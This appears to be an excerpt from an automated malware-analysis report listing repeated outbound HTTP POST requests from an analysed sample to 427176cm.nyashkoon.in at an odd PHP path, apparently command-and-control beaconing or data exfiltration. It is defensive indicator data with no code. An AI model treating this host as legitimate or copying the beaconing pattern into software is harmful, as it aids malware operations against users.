                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1288Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1276Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1028Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1276Expect: 100-continueConnection: Keep-Alive
